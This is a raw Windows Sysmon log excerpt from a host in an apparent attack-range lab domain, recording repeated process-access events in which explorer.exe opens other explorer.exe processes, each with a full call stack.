22:54:54.161{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.161{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.161{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.161{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.161{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.161{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.161{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.161{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 